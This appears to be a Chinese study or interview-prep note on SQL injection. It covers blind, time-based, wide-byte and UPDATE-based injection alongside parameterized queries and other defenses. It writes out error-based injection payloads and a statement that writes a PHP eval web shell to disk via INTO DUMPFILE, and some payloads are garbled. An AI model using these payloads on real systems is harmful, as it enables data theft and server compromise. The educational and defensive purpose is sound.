目录
- SQL 注入漏洞成因、注入的类型和方式、防范?
- 盲注是什么?怎么盲注?
- 宽字节注入原理
- SQL 里面只有 update 怎么利用
- 为什么参数化查询可以防止SQL 注入?
- 报错注入的函数有哪些?
- 如何防护SQL注入攻击呢?
- 总结
SQL 注入漏洞成因、注入的类型和方式、防范?
提交错误语句是否有异常,除此之外这些显示的错误可以通过 sleep,修眠语句执⾏ 5 秒,通过 DNSlog 判断传回值等。
select * from news where id = '$SQL';
当程序执⾏访问新闻等⼀些操作都会执⾏到 sql 语句进行调用,如果在此调⽤过程中,提交了不合法的数据,⽽数据库⽆法识别则会报错。也就是⼀切输⼊都是有害的。
注入类型有 6 种,可以参考 SQLMAP,报错、盲注、联合、时间、内联、堆叠
注入提交方式:GET、POST、Cookies、⽂件头
防范: 边界 -> CDN(内容分发网络) -> 脚本语⾔过滤 -> 数据库过滤最小权限 -> 主机
盲注是什么?怎么盲注?
盲注是在 SQL 注⼊攻击过程中,服务器关闭了错误回显,我们单纯通过服务器返回内容的变化来判断是否存在 SQL 注⼊和利⽤的⽅式。
盲注的⼿段有两种,
⼀个是通过⻚⾯的返回内容是否正确 (boolean-based),来验证是否存在注⼊。
⼀个是通过 sql 语句处理时间的不同来判断是否存在注⼊ (time-based),在这⾥,可以⽤ benchmark,sleep 等造成延时效果的函数,也可以通过构造⼤笛卡⼉积的联合查询表来达到延时的⽬的。
宽字节注入原理
1、产⽣原理
在数据库使⽤了宽字符集而 WEB 中没考虑这个问题的情况下,在 WEB 层,由于 0XBF27 是两个字符,在 PHP 中⽐如addslash 和 magic_quotes_gpc 开启时,由于会对 0x27 单引号进⾏转义,因此 0xbf27 会变成 0xbf5c27, ⽽数据进⼊数据库中时,由于 0XBF5C 是⼀个另外的字符,因此 转义符号会被前⾯的 bf 带着 “吃掉”,单引号由此逃逸出来可以⽤来闭合语句。
2、根本原因
character_set_client(客户端的字符集) 和 character_set_connection(连接层的字符集) 不同, 或转换函数如,iconv、mb_convert_encoding 使⽤不当。
3、解决办法
统⼀数据库、Web 应⽤、操作系统所使⽤的字符集,避免解析产⽣差异,最好都设置为 UTF-8。或对数据进⾏正确的转义,如 mysql_real_escape_string+mysql_set_charset 的使⽤。
SQL 里面只有 update 怎么利用
先理解这句 SQL
UPDATE user SET password='MD5($password)', homepage='$homepage' WHERE id='$id'
如果此 SQL 被修改成以下形式,就实现了注⼊
1、修改 homepage 值为 http://xxx.net’, userlevel='3
之后 SQL 语句变为
UPDATE user SET password='mypass', homepage='http://xxx.net', userlevel='3' WHERE id='$id'
userlevel 为⽤户级别
2、修改 password 值为 mypass)’ WHERE username=‘admin’#
之后 SQL 语句变为
UPDATE user SET password='MD5(mypass)' WHERE username='admin'#)', homepage='$homepage' WHERE id='$id'
3、修改 id 值为 ’ OR username=‘admin’ 之后 SQL 语句变为
UPDATE user SET password='MD5($password)', homepage='$homepage' WHERE id='' OR username='admin'
为什么参数化查询可以防止SQL 注入?
原理:
使⽤参数化查询数据库服务器不会把参数的内容当作 sql 指令的⼀部分来执⾏,是在数据库完成 sql 指令的编译后才套⽤参数运⾏。
简单的说: 参数化能防注⼊的原因在于, 语句是语句,参数是参数,参数的值并不是语句的⼀部分,数据库只按语句的语义跑。
报错注入的函数有哪些?
and extractvalue(1, concat(0x7e,(select @@version),0x7e)) 通过floor报错 向下取整3)+and updatexml(1, concat(0x7e,(secect @@version),0x7e),1) geometrycollection()select from test where id=1 and geometrycollection((select from(selectfrom(select user())a)b)); multipoint()select from test where id=1 and multipoint((select from(select from(select user())a)b)); polygon()select from test where id=1 and polygon((select from(select from(select user())a)b)); multipolygon()select from test where id=1 and multipolygon((select from(select from(select user())a)b)); linestring()select from test where id=1 and linestring((select from(select from(select user())a)b)); multilinestring()select from test where id=1 and multilinestring((select from(select from(select user())a)b)); exp()select from test where id=1 and exp(~(select * from(select user())a));
延时注入如何来判断?
if(ascii(substr(“hello”, 1, 1))=104, sleep(5), 1)
盲注和延时注入的共同点?
都是⼀个字符⼀个字符的判断。
sql 注入写文件都有哪些函数?
select '⼀句话' into outfile '路径' select '⼀句话' into dumpfile '路径' select '<?php eval($_POST[1]) ?>' into dumpfile 'd:\wwwroot\baidu.com\nvhack.php;
如何防护SQL注入攻击呢?
1.对代码进行过滤非法符号如</?&>之类的,对一些脚本标签scrpt以及img或frame都进行过滤和替换。
2.对一些函数变量直接进行强制定义,比如金额函数这里直接限定只能写入正整数类型的数值,那么其他的参数像姓名的话可以直接限定到只允许写入中文和英文的数值,其他的以此类推。
3.对一些带入数据库查询和更新的语句,一定要看看get或post过来的数据参数是否是直接把参数类型锁定好了的,防止被注入恶意语句导致被攻击。
